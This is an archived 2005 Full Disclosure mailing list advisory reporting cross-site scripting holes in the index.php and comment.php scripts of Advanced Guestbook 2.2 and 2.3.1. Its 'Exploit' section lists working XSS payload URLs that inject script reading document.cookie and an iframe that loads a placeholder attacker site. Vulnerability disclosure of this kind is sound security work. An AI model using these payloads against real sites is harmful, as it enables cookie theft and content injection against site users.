Full Disclosure: Advanced Guestbook remote XSS exploit

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Full Disclosure mailing list archives

Advanced Guestbook remote XSS exploit

From: handrix () morx org
Date: Sun, 25 Dec 2005 22:52:02 +0100

Advanced Guestbook 2.2 and 2.3.1 and possibly other versions
remote XSS vulnerabilities
By: Handrix <handrix_at_morx_org>
16 December 2005
MorX security research team
www.morx.org 

Description:

Advanced Guestbook is a PHP-based guestbook script.

index.php and comment.php scripts are vulnerable to XSS attacks. This issue 
can allow an attacker
to bypass content filters and potentially carry out cross-site scripting, HTML 
injection and other
attacks.

Exploit:

http://www.example.com/guestbook/index.php?entry=<script>alert(document.cookie);</script>
http://www.example.com/guestbook/index.php?entry=<iframe 
src=http://www.attackersite.com/>

http://www.example.com/guestbook/comment.php?gb_id=1<script>alert(document.cookie);</script>
http://www.example.com/guestbook/comment.php?gb_id=1<IFRAME 
SRC="javascript:alert('XSS');"></IFRAME>


Vulnerable versions :

Advanced Guestbook 2.2
Advanced Guestbook 2.3.1 

        

        
                
___________________________________________________________________________ 
Nouveau : téléphonez moins cher avec Yahoo! Messenger ! Découvez les tarifs exceptionnels pour appeler la France et 
l'international.
Téléchargez sur http://fr.messenger.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

By Date By Thread

Current thread:

Advanced Guestbook remote XSS exploit handrix (Dec 25)